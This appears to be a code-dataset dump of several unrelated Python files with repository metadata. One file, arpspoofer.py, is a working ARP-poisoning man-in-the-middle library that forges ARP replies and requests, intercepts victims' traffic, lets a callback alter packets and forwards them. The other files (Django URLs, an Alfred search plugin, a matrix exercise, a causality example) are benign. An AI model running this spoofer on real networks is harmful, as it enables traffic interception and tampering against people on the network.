| 41.773936 | 88 | 0.61046 | 3,706 | 31,414 | 4.886131 | 0.09606 | 0.030373 | 0.035178 | 0.027612 | 0.434725 | 0.357742 | 0.313397 | 0.262591 | 0.21173 | 0.151811 | 0 | 0.00595 | 0.299166 | 31,414 | 751 | 89 | 41.829561 | 0.816543 | 0.068441 | 0 | 0.223729 | 0 | 0 | 0.05033 | 0.008876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.10339 | false | 0.00339 | 0.013559 | 0.00339 | 0.277966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c41032c50ef5d1788dcc18837fdc341819e52a | 10,351 | py | Python | pyarpspoofer/arpspoofer.py | bocajspear1/pyarpspoofer | 5612e0c900c070d98743bb8fdd39743a0ce09cf2 | [
"MIT"
] | null | null | null | pyarpspoofer/arpspoofer.py | bocajspear1/pyarpspoofer | 5612e0c900c070d98743bb8fdd39743a0ce09cf2 | [
"MIT"
] | null | null | null | pyarpspoofer/arpspoofer.py | bocajspear1/pyarpspoofer | 5612e0c900c070d98743bb8fdd39743a0ce09cf2 | [
"MIT"
] | null | null | null | """
MIT License
Copyright (c) 2018 Jacob Hartman
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
import threading
import time
import copy
from scapy.all import *
import ipaddress
def is_python_2():
    """Return True when running under a Python 2 interpreter."""
    return sys.version_info.major == 2
if is_python_2():
import Queue as queue
else:
import queue
class SniffThread (threading.Thread):
    """Daemon thread that sniffs packets on an interface and queues them.

    Packets matching the BPF *filter* are pushed onto *out_queue*; sniffing
    stops once stop_sniffing() has been called (checked per packet).
    """

    def __init__(self, interface, out_queue, filter=""):
        threading.Thread.__init__(self)
        self._queue = out_queue
        self._filter = filter
        self._interface = interface
        self.daemon = True
        # BUG FIX: named _stop_requested, not _stop, because threading.Thread
        # defines an internal _stop() *method* on Python 3; shadowing it with
        # a bool makes join()/is_alive() raise TypeError after the thread ends.
        self._stop_requested = False

    def sniff(self, pkt):
        """scapy ``prn`` callback: push each captured packet onto the queue."""
        self._queue.put(pkt)

    def is_stopping(self, pkt):
        """scapy ``stop_filter``: return True once stop_sniffing() was called."""
        return self._stop_requested

    def run(self):
        sniff(prn=self.sniff, store=0, iface=self._interface,
              filter=self._filter, stop_filter=self.is_stopping)
        print("done")

    def stop_sniffing(self):
        """Ask the sniffing loop to terminate after the next captured packet."""
        self._stop_requested = True
class ArpRequestPoisoner(threading.Thread):
    """Daemon thread that poisons ARP caches using broadcast ARP requests.

    While running, broadcasts requests that make every victim IP appear to
    live at our MAC; once stopped, it re-arps the victims with their real
    MAC addresses to restore the network.
    """

    def __init__(self, mac, interface, ip_map, free_ip, incr=2):
        threading.Thread.__init__(self)
        self.daemon = True
        self._mac = mac
        self._interface = interface
        self._ip_map = ip_map
        self._incr = incr
        self._running = True
        self._free_ip = free_ip

    def stop_poison(self):
        """Signal the poisoning loop to stop and begin re-arping."""
        self._running = False

    def _broadcast(self, src_mac, src_ip, dst_ip):
        """Send one broadcast ARP request appearing to come from src_mac/src_ip."""
        frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=src_mac, type=0x806) / ARP(
            op=1, hwsrc=src_mac, psrc=src_ip, pdst=dst_ip)
        sendp(frame, iface=self._interface, verbose=0)

    def run(self):
        # Poison until asked to stop: claim every victim IP is at our MAC.
        while self._running:
            for victim_ip in self._ip_map:
                self._broadcast(self._mac, victim_ip, self._free_ip)
            time.sleep(self._incr)
        print("ArpRequestPoisoner stopped, re-arping...")
        # Re-arp: broadcast the victims' genuine MAC addresses a few times.
        for _ in range(3):
            for victim_ip in self._ip_map:
                self._broadcast(self._ip_map[victim_ip], victim_ip, self._free_ip)
            time.sleep(self._incr)
        # Also refresh the reverse direction (free IP -> victims) from our MAC.
        for _ in range(3):
            for victim_ip in self._ip_map:
                self._broadcast(self._mac, self._free_ip, victim_ip)
            time.sleep(self._incr)
class ArpResponsePoisoner(threading.Thread):
    """Daemon thread that poisons ARP caches using unsolicited ARP replies.

    While running, every known host is told that every other known IP is at
    our MAC; once stopped, the genuine MAC addresses are replayed to restore
    the victims' caches.
    """

    def __init__(self, mac, interface, ip_map, incr=2):
        threading.Thread.__init__(self)
        self.daemon = True
        self._mac = mac
        self._interface = interface
        self._ip_map = ip_map
        self._incr = incr
        self._running = True

    def stop_poison(self):
        """Signal the poisoning loop to stop and begin re-arping."""
        self._running = False

    def _send_reply(self, target_ip, claimed_ip, claimed_mac):
        """Tell *target_ip* that *claimed_ip* lives at *claimed_mac*."""
        frame = Ether(
            dst=self._ip_map[target_ip],
            src=claimed_mac,
            type=0x806) / ARP(
                op=2,
                pdst=target_ip,
                hwdst=self._ip_map[target_ip],
                psrc=claimed_ip,
                hwsrc=claimed_mac)
        sendp(frame, iface=self._interface, verbose=0)

    def run(self):
        # Poison until asked to stop: claim every IP resolves to our MAC.
        while self._running:
            for target_ip in self._ip_map:
                for claimed_ip in self._ip_map:
                    self._send_reply(target_ip, claimed_ip, self._mac)
            time.sleep(self._incr)
        print("ArpResponsePoisoner stopped, re-arping...")
        # Re-arp: replay the genuine MAC for every IP a few times.
        for _ in range(3):
            for target_ip in self._ip_map:
                for claimed_ip in self._ip_map:
                    self._send_reply(target_ip, claimed_ip,
                                     self._ip_map[claimed_ip])
            time.sleep(self._incr)
class PacketIntercept(threading.Thread):
    """Consumes packets lured to us by the poisoners and forwards them on.

    An optional *on_packet* callback receives a deep copy of each packet and
    may return a (modified) packet to forward, or a falsy value to drop it.
    """

    def __init__(self, mac_address, ip_address, interface, ip_map, on_packet):
        threading.Thread.__init__(self)
        self._on_packet = on_packet
        self._mac = mac_address
        self._interface = interface
        self._ip_map = ip_map
        self._ip = ip_address
        self._running = True
        self._pkt_queue = queue.Queue()

    def stop_processing(self):
        """Stop the loop; the None sentinel unblocks the pending queue get."""
        self._running = False
        self._pkt_queue.put(None)

    def run(self):
        bpf = ("not arp and not host " + str(self._ip) +
               " and ether host " + self._mac)
        sniffer = SniffThread(self._interface, self._pkt_queue, bpf)
        sniffer.start()
        while self._running:
            pkt = self._pkt_queue.get()
            # Only handle Ethernet frames addressed to us by someone else.
            if not (pkt and Ether in pkt and pkt.dst == self._mac
                    and pkt.src != self._mac):
                continue
            if self._on_packet:
                out_pkt = self._on_packet(copy.deepcopy(pkt))
            else:
                out_pkt = pkt
            # A falsy value from the callback means drop the packet.
            if not out_pkt:
                continue
            # Forward only to hosts we know the real MAC of.
            if Ether in out_pkt and IP in out_pkt and out_pkt[IP].dst in self._ip_map:
                dst_ip = out_pkt[IP].dst
                out_pkt[Ether].dst = self._ip_map[dst_ip]
                out_pkt[Ether].src = self._mac
                sendp(out_pkt, iface=self._interface, verbose=0)
        sniffer.stop_sniffing()
class ArpSpoofer():
    """Coordinates ARP mapping, cache poisoning and packet interception."""

    @staticmethod
    def _to_text(value):
        """Coerce *value* to the text type the ipaddress module expects."""
        if sys.version_info[0] == 2:
            return unicode(value)  # noqa: F821 - Python 2 only
        return str(value)

    def __init__(self, network_address, interface, mac_address, ip_address):
        self._target_addresses = []
        if "-" in network_address:
            # Range notation, e.g. "192.168.1.10-20": a start address plus an
            # end value for the final octet (inclusive).
            start_str, end_str = network_address.split("-")
            start_ip = ipaddress.ip_address(self._to_text(start_str))
            first_octet = int(start_ip.exploded.split(".")[3])
            for offset in range(int(end_str) - first_octet + 1):
                self._target_addresses.append(start_ip + offset)
        else:
            # CIDR notation, e.g. "192.168.1.0/24".
            # BUG FIX: the original overwrote network_address with None before
            # parsing it, so this branch always raised a TypeError.
            network = ipaddress.ip_network(self._to_text(network_address))
            for host in network.hosts():
                self._target_addresses.append(host)
        # Parse our own (source) IP.
        self._ip = ipaddress.ip_address(self._to_text(ip_address))
        self._interface = interface
        self._mac = mac_address
        self._on_intercept = None
        self._mac_map = {}
        self._ip_map = {}
        self._pkt_queue = None
        self._running = True
        self._resp_poison = None
        self._req_poison = None
        # BUG FIX: initialise here so stop_spoof() before start_spoof()
        # cannot raise AttributeError.
        self._intecept = None

    def set_intercept(self, intercept_func):
        """Register a callback invoked for every intercepted packet."""
        self._on_intercept = intercept_func

    def start_spoof(self, on_packet=None):
        """Map live hosts via ARP, then start the poisoner/intercept threads."""
        print("Building IP to MAC address map...")
        arp_queue = queue.Queue()
        arp_resp_sniff = SniffThread(self._interface, arp_queue, "arp")
        arp_resp_sniff.start()
        time.sleep(0.5)
        all_hosts = []
        for host in self._target_addresses:
            if host == self._ip:
                print("! - Skipping self at " + str(self._ip))
                continue
            arp_frame = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._mac,
                              type=0x806) / ARP(op=1, pdst=str(host),
                                                psrc=str(self._ip))
            sendp(arp_frame, iface=self._interface, verbose=0)
            all_hosts.append(host)
        time.sleep(1)
        arp_resp_sniff.stop_sniffing()
        # Collect ARP replies into forward (MAC->IP) and reverse (IP->MAC) maps.
        while not arp_queue.empty():
            resp = arp_queue.get()
            if ARP in resp and resp[ARP].op == 2:
                self._mac_map[resp[ARP].hwsrc] = resp[ARP].psrc
                self._ip_map[resp[ARP].psrc] = resp[ARP].hwsrc
        # Pick an address with no responding host as the "free" IP used by
        # the request poisoner; fall back to the last probed host.
        free_ip = all_hosts[-1]
        for host in self._target_addresses:
            if str(host) not in self._ip_map:
                free_ip = str(host)
                break
        print("Mapping complete...")
        self._req_poison = ArpRequestPoisoner(self._mac, self._interface,
                                              self._ip_map, free_ip)
        self._req_poison.start()
        self._resp_poison = ArpResponsePoisoner(self._mac, self._interface,
                                                self._ip_map)
        self._resp_poison.start()
        print("Intercepting packets...")
        self._intecept = PacketIntercept(self._mac, self._ip, self._interface,
                                         self._ip_map, on_packet)
        self._intecept.start()

    def stop_spoof(self):
        """Stop poisoning (re-arping the victims) and shut down interception."""
        print("Re-arping clients")
        if self._resp_poison:
            self._resp_poison.stop_poison()
            self._resp_poison.join()
        if self._req_poison:
            self._req_poison.stop_poison()
            self._req_poison.join()
        print("Stopping intercept...")
        if self._intecept:
            self._intecept.stop_processing()
            self._intecept.join()
| 34.274834 | 155 | 0.589025 | 1,315 | 10,351 | 4.364259 | 0.171863 | 0.035546 | 0.040774 | 0.016728 | 0.369228 | 0.306848 | 0.301795 | 0.268862 | 0.268862 | 0.239763 | 0 | 0.009074 | 0.318617 | 10,351 | 301 | 156 | 34.388704 | 0.804622 | 0.118636 | 0 | 0.386792 | 0 | 0 | 0.036232 | 0 | 0 | 0 | 0.003294 | 0 | 0 | 1 | 0.089623 | false | 0 | 0.037736 | 0.009434 | 0.160377 | 0.042453 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c515b10ccba3215103fa7169a17fded5d650d8 | 298 | py | Python | tests/test_app/urls.py | emorozov/django-reversion | 43b732b29b1023d984b3deb73b03c7d691db520d | [
"BSD-3-Clause"
] | 1,735 | 2015-01-01T17:57:11.000Z | 2022-03-28T10:53:27.000Z | tests/test_app/urls.py | emorozov/django-reversion | 43b732b29b1023d984b3deb73b03c7d691db520d | [
"BSD-3-Clause"
] | 554 | 2015-01-02T17:31:31.000Z | 2022-02-22T10:30:04.000Z | tests/test_app/urls.py | emorozov/django-reversion | 43b732b29b1023d984b3deb73b03c7d691db520d | [
"BSD-3-Clause"
] | 368 | 2015-01-02T03:32:18.000Z | 2022-03-31T09:48:31.000Z | from django.urls import path
from test_app import views
urlpatterns = [
path("save-obj/", views.save_obj_view),
path("save-obj-error/", views.save_obj_error_view),
path("create-revision/", views.create_revision_view),
path("revision-mixin/", views.RevisionMixinView.as_view()),
]
| 27.090909 | 63 | 0.724832 | 41 | 298 | 5.04878 | 0.439024 | 0.135266 | 0.10628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127517 | 298 | 10 | 64 | 29.8 | 0.796154 | 0 | 0 | 0 | 0 | 0 | 0.184564 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44cb0ba9c0f8df7004f8672416120408c2f977bc | 350 | py | Python | app/helpers.py | kilonzi/dukaone | 0563f1329f87df17424d6c058b46f6bdede46f2f | [
"MIT"
] | null | null | null | app/helpers.py | kilonzi/dukaone | 0563f1329f87df17424d6c058b46f6bdede46f2f | [
"MIT"
] | null | null | null | app/helpers.py | kilonzi/dukaone | 0563f1329f87df17424d6c058b46f6bdede46f2f | [
"MIT"
] | null | null | null | from db.models import *
def unpack_query_objects(objects) -> list:
    """Return each model instance in *objects* converted via its ``to_dict()``.

    Fixes the original return annotation, which claimed ``dict`` although a
    list of dicts has always been returned.
    """
    return [item.to_dict() for item in objects]
def stringify_object(object) -> dict:
    """Return the object's ``to_dict()`` mapping with every value stringified."""
    return {key: str(value) for key, value in object.to_dict().items()}
| 23.333333 | 42 | 0.642857 | 50 | 350 | 4.3 | 0.46 | 0.139535 | 0.111628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007491 | 0.237143 | 350 | 14 | 43 | 25 | 0.797753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44cdc0c7246c968a7e2f2abbae018d1456bcdfd9 | 8,239 | py | Python | src/lib/searchio/cmd/reload.py | cgxxv/alfred-searchio | f4a14cbe5350b83d6d962aa993abf01f14b60d33 | [
"MIT"
] | 304 | 2015-01-15T08:18:47.000Z | 2022-03-31T10:41:52.000Z | src/lib/searchio/cmd/reload.py | cgxxv/alfred-searchio | f4a14cbe5350b83d6d962aa993abf01f14b60d33 | [
"MIT"
] | 66 | 2015-03-14T18:10:36.000Z | 2022-03-27T11:33:56.000Z | src/lib/searchio/cmd/reload.py | cgxxv/alfred-searchio | f4a14cbe5350b83d6d962aa993abf01f14b60d33 | [
"MIT"
] | 36 | 2015-04-12T16:50:17.000Z | 2022-03-28T09:53:32.000Z | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2016 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2016-12-17
#
"""searchio reload [-h]
Update info.plist from saved searches.
Usage:
searchio reload [--defaults]
searchio -h
Options:
-d, --defaults Use default searches, not user's.
-h, --help Display this help message.
"""
from __future__ import print_function, absolute_import
import json
import os
from plistlib import readPlist, readPlistFromString, writePlist
from docopt import docopt
from searchio.core import Context
from searchio.engines import Search
from searchio import util
log = util.logger(__name__)
# X position of all generated Script Filters
XPOS = 270
# Y position of first Script Filter
YPOS = 220
# Vertical space between (top of) each Script Filter
YOFFSET = 170
# UID of action to connect Script Filters to
OPEN_URL_UID = '1133DEAA-5A8F-4E7D-9E9C-A76CB82D9F92'
SCRIPT_FILTER = """
<dict>
<key>config</key>
<dict>
<key>alfredfiltersresults</key>
<false/>
<key>alfredfiltersresultsmatchmode</key>
<integer>0</integer>
<key>argumenttrimmode</key>
<integer>0</integer>
<key>argumenttype</key>
<integer>0</integer>
<key>escaping</key>
<integer>102</integer>
<key>keyword</key>
<string>g</string>
<key>queuedelaycustom</key>
<integer>3</integer>
<key>queuedelayimmediatelyinitially</key>
<false/>
<key>queuedelaymode</key>
<integer>0</integer>
<key>queuemode</key>
<integer>2</integer>
<key>runningsubtext</key>
<string>Fetching results…</string>
<key>script</key>
<string>./searchio search google-en "$1"</string>
<key>scriptargtype</key>
<integer>1</integer>
<key>scriptfile</key>
<string></string>
<key>subtext</key>
<string>Searchio!</string>
<key>title</key>
<string>Google Search (English)</string>
<key>type</key>
<integer>0</integer>
<key>withspace</key>
<true/>
</dict>
<key>type</key>
<string>alfred.workflow.input.scriptfilter</string>
<key>uid</key>
<string>18E144DF-1054-4A12-B5F0-AC05C6F7DEFD</string>
<key>version</key>
<integer>2</integer>
</dict>
"""
# Default search engines
DEFAULTS = [
{
'title': 'Google (English)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'g',
'search_url': 'https://www.google.com/search?q={query}&hl=en&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=en',
'uid': 'google-en',
},
{
'title': 'Google (Deutsch)',
'icon': 'icons/engines/google.png',
'jsonpath': '$[1][*]',
'keyword': 'gd',
'search_url': 'https://www.google.com/search?q={query}&hl=de&safe=off',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&q={query}&hl=de',
'uid': 'google-de',
},
{
'title': 'Wikipedia (English)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'w',
'search_url': 'https://en.wikipedia.org/wiki/{query}',
'suggest_url': 'https://en.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-en',
},
{
'title': 'Wikipedia (Deutsch)',
'icon': 'icons/engines/wikipedia.png',
'jsonpath': '$[1][*]',
'pcencode': True,
'keyword': 'wd',
'search_url': 'https://de.wikipedia.org/wiki/{query}',
'suggest_url': 'https://de.wikipedia.org/w/api.php?action=opensearch&search={query}',
'uid': 'wikipedia-de',
},
{
'title': 'YouTube (United States)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'yt',
'search_url': 'https://www.youtube.com/results?gl=us&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=us&q={query}',
'uid': 'youtube-us',
},
{
'title': 'YouTube (Germany)',
'icon': 'icons/engines/youtube.png',
'jsonpath': '$[1][*]',
'keyword': 'ytd',
'search_url': 'https://www.youtube.com/results?gl=de&persist_gl=1&search_query={query}',
'suggest_url': 'https://suggestqueries.google.com/complete/search?client=firefox&ds=yt&hl=de&q={query}',
'uid': 'youtube-de',
},
]
def usage(wf=None):
    """Return the CLI usage text for this sub-command (the module docstring)."""
    return __doc__
def remove_script_filters(wf, data):
    """Remove auto-generated Script Filters from info.plist data.

    Generated objects are recognised by their uidata entries lacking a
    ``colorindex`` key; their connections and uidata entries are removed
    along with the objects themselves.
    """
    generated = {uid for uid, ui in data['uidata'].items()
                 if 'colorindex' not in ui}
    remaining = []
    removed = []
    for obj in data['objects']:
        if (obj['uid'] in generated
                and obj['type'] == 'alfred.workflow.input.scriptfilter'):
            log.info('Removed Script Filter "%s" (%s)',
                     obj['config']['title'], obj['uid'])
            removed.append(obj['uid'])
        else:
            remaining.append(obj)
    data['objects'] = remaining
    # Drop the connections and UI metadata of everything that was removed.
    for uid in removed:
        del data['connections'][uid]
        del data['uidata'][uid]
def add_script_filters(wf, data, searches=None):
    """Add user searches to info.plist data as Script Filter objects.

    If *searches* is given, the searches are first saved into the user's
    searches directory and only those searches are generated; otherwise
    every saved search is loaded. Each search becomes a Script Filter wired
    to the shared Open URL action, laid out vertically in the editor.
    """
    ctx = Context(wf)
    restrict_to = set()
    if searches:  # persist the supplied searches, then regenerate only them
        for search in searches:
            dest = os.path.join(ctx.searches_dir, search.uid + '.json')
            with open(dest, 'wb') as fp:
                json.dump(search.dict, fp)
            restrict_to.add(search.uid)
            log.info('Saved search "%s"', search.title)
    finder = util.FileFinder([ctx.searches_dir], ['json'])
    searches = [Search.from_file(p) for p in finder]
    if restrict_to:
        searches = [s for s in searches if s.uid in restrict_to]
    searches.sort(key=lambda s: s.title)
    ypos = YPOS
    for search in searches:
        if not search.keyword:
            log.error('No keyword for search "%s" (%s)', search.title,
                      search.uid)
            continue
        # Start from the Script Filter template and fill in this search.
        obj = readPlistFromString(SCRIPT_FILTER)
        obj['uid'] = search.uid
        obj['config']['title'] = search.title
        obj['config']['script'] = './search {} "$1"'.format(search.uid)
        obj['config']['keyword'] = search.keyword
        data['objects'].append(obj)
        # Wire the new Script Filter to the shared Open URL action.
        data['connections'][search.uid] = [{
            'destinationuid': OPEN_URL_UID,
            'modifiers': 0,
            'modifiersubtext': '',
            'vitoclose': False,
        }]
        data['uidata'][search.uid] = {
            'note': search.title,
            'xpos': XPOS,
            'ypos': ypos,
        }
        ypos += YOFFSET
        log.info('Added Script Filter "%s" (%s)', search.title, search.uid)
    link_icons(wf, searches)
def link_icons(wf, searches):
    """Create symlinks for Script Filter icons inside the workflow directory."""
    # Clear out any icon symlinks left over from a previous run.
    for filename in os.listdir(wf.workflowdir):
        if not filename.endswith('.png'):
            continue
        path = wf.workflowfile(filename)
        if os.path.islink(path):
            os.unlink(path)
            log.debug('Removed search icon "%s"', path)
    for search in searches:
        dest = wf.workflowfile(search.uid + '.png')
        if os.path.exists(dest):
            continue
        # Link with paths relative to the workflow directory so the
        # bundle stays portable.
        rel_src = os.path.relpath(search.icon, wf.workflowdir)
        rel_dest = os.path.relpath(dest, wf.workflowdir)
        log.debug('Linking "%s" to "%s"', rel_src, rel_dest)
        os.symlink(rel_src, rel_dest)
def run(wf, argv):
    """Run ``searchio reload`` sub-command.

    Rebuilds the workflow's Script Filters in info.plist from the saved
    searches (or from the built-in defaults when --defaults is given).
    """
    args = docopt(usage(wf), argv)
    log.debug('args=%r', args)
    # With --defaults, regenerate from the built-in engine list.
    searches = None
    if args['--defaults']:
        searches = [Search.from_dict(d) for d in DEFAULTS]
    info_plist = wf.workflowfile('info.plist')
    data = readPlist(info_plist)
    remove_script_filters(wf, data)
    add_script_filters(wf, data, searches)
    writePlist(data, info_plist)
| 29.320285 | 112 | 0.572157 | 993 | 8,239 | 4.699899 | 0.266868 | 0.02057 | 0.02057 | 0.019284 | 0.281766 | 0.236555 | 0.218556 | 0.192843 | 0.141847 | 0.141847 | 0 | 0.013266 | 0.258891 | 8,239 | 280 | 113 | 29.425 | 0.750573 | 0.115305 | 0 | 0.17619 | 0 | 0.047619 | 0.462771 | 0.090897 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.038095 | 0 | 0.066667 | 0.004762 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d22b17f45772c546f11f4444520b63362e9cd5 | 766 | py | Python | slide_09/Exercicio04.py | lordjack/aula_python_slides | 38ad45ac1843fc83c3349addb9d49f7d182a574f | [
"MIT"
] | null | null | null | slide_09/Exercicio04.py | lordjack/aula_python_slides | 38ad45ac1843fc83c3349addb9d49f7d182a574f | [
"MIT"
] | null | null | null | slide_09/Exercicio04.py | lordjack/aula_python_slides | 38ad45ac1843fc83c3349addb9d49f7d182a574f | [
"MIT"
] | null | null | null | '''
Q04 - Faça um programa que leia uma matriz 3x3 de inteiros,
e apresente a Diagonal Principal desta Matriz.
'''
import random
# x = random.uniform(0, 10)
matriz = []
diagonalPrincipal = []
for i in range(0, 3, 1):
linha = []
for j in range(0, 3, 1):
# elemento = int(input("Digite o elemento da posição [%d]: " % (i)))
linha.append(random.randint(10, 60))
if (i == j):
diagonalPrincipal.append(linha[i])
matriz.append(linha)
print()
# print(matriz)
for i in range(0, 3, 1):
for j in range(0, 3, 1):
print(f"[{matriz[j][i]}]", end='')
print()
print()
for i in range(0, 3, 1):
for j in range(0, 3, 1):
print(f"[{matriz[i][j]}]", end='')
print()
print()
print(diagonalPrincipal)
| 23.212121 | 76 | 0.571802 | 117 | 766 | 3.74359 | 0.401709 | 0.09589 | 0.109589 | 0.123288 | 0.246575 | 0.246575 | 0.246575 | 0.182648 | 0.182648 | 0.182648 | 0 | 0.050523 | 0.250653 | 766 | 32 | 77 | 23.9375 | 0.712544 | 0.279373 | 0 | 0.5 | 0 | 0 | 0.059041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.045455 | 0.363636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d38b1f211f5c9e46f3fcd73adf617055c70c17 | 4,268 | py | Python | examples/forest_fire_disjunctive.py | kevinmcareavey/pyactualcausality | 51367d768dde3b1b039373db5797efb087003cd4 | [
"MIT"
] | null | null | null | examples/forest_fire_disjunctive.py | kevinmcareavey/pyactualcausality | 51367d768dde3b1b039373db5797efb087003cd4 | [
"MIT"
] | null | null | null | examples/forest_fire_disjunctive.py | kevinmcareavey/pyactualcausality | 51367d768dde3b1b039373db5797efb087003cd4 | [
"MIT"
] | null | null | null | from frozendict import frozendict
from lib.halpern_pearl import Variable, CausalNetwork, CausalSetting, find_actual_causes, CausalFormula, PrimitiveEvent, \
Negation, find_trivial_explanations, EpistemicState, find_nontrivial_explanations, find_explanations, \
find_sufficient_causes
U_L, U_MD = Variable("U_L"), Variable("U_MD")
FF, L, MD = Variable("FF"), Variable("L"), Variable("MD")
exogenous_domains = {
U_L: {False, True},
U_MD: {False, True}
}
endogenous_domains = {
FF: {False, True},
L: {False, True},
MD: {False, True}
}
causal_network = CausalNetwork()
causal_network.add_dependency(FF, [L, MD], lambda parent_values: parent_values[L] or parent_values[MD])
causal_network.add_dependency(L, [U_L], lambda parent_values: parent_values[U_L])
causal_network.add_dependency(MD, [U_MD], lambda parent_values: parent_values[U_MD])
context = {U_L: True, U_MD: True}
causal_setting = CausalSetting(causal_network, context, exogenous_domains, endogenous_domains)
event = PrimitiveEvent(FF, True)
# list(find_actual_causes(event, causal_setting))
causal_network.write("forest_fire_disjunctive.png")
actual_causes = {frozendict(actual_cause) for actual_cause in find_actual_causes(event, causal_setting)}
expected_actual_causes = [{FF: True}, {L: True, MD: True}]
assert actual_causes == {frozendict(expected_actual_cause) for expected_actual_cause in expected_actual_causes}
sufficient_causes = {frozendict(sufficient_cause) for sufficient_cause in find_sufficient_causes(event, causal_setting)}
expected_sufficient_causes = [{FF: True}, {L: True}, {FF: True, L: True}, {MD: True}, {FF: True, MD: True}, {L: True, MD: True}, {FF: True, L: True, MD: True}]
assert sufficient_causes == {frozendict(expected_sufficient_cause) for expected_sufficient_cause in expected_sufficient_causes}
assert CausalFormula({MD: False}, event).entailed_by(causal_setting) # (Md, (1, 1)) |= [MD ← 0](FF = 1) example from Page 21 [Halpern, 2016]
assert CausalFormula({L: False}, event).entailed_by(causal_setting) # (Md, (1, 1)) |= [L ← 0](FF = 1) example from Page 21 [Halpern, 2016]
assert CausalFormula({L: False, MD: False}, Negation(event)).entailed_by(causal_setting) # (Md, (1, 1)) |= [L ← 0; MD ← 0](FF = 0) example from Page 21 [Halpern, 2016]
u0 = {U_L: False, U_MD: False}
u1 = {U_L: True, U_MD: False}
u2 = {U_L: False, U_MD: True}
u3 = {U_L: True, U_MD: True}
k1 = EpistemicState(causal_network, [u0, u1, u2, u3], exogenous_domains, endogenous_domains)
k2 = EpistemicState(causal_network, [u0, u1, u2], exogenous_domains, endogenous_domains)
k3 = EpistemicState(causal_network, [u0, u1, u3], exogenous_domains, endogenous_domains)
k4 = EpistemicState(causal_network, [u1, u3], exogenous_domains, endogenous_domains)
epistemic_states = [k1, k2, k3, k4]
explanations = [{frozendict(explanation) for explanation in find_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_explanations = [
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}],
[{FF: True}, {L: True}, {MD: True}]
]
assert explanations == [{frozendict(expected_explanation) for expected_explanation in epistemic_state} for epistemic_state in expected_explanations]
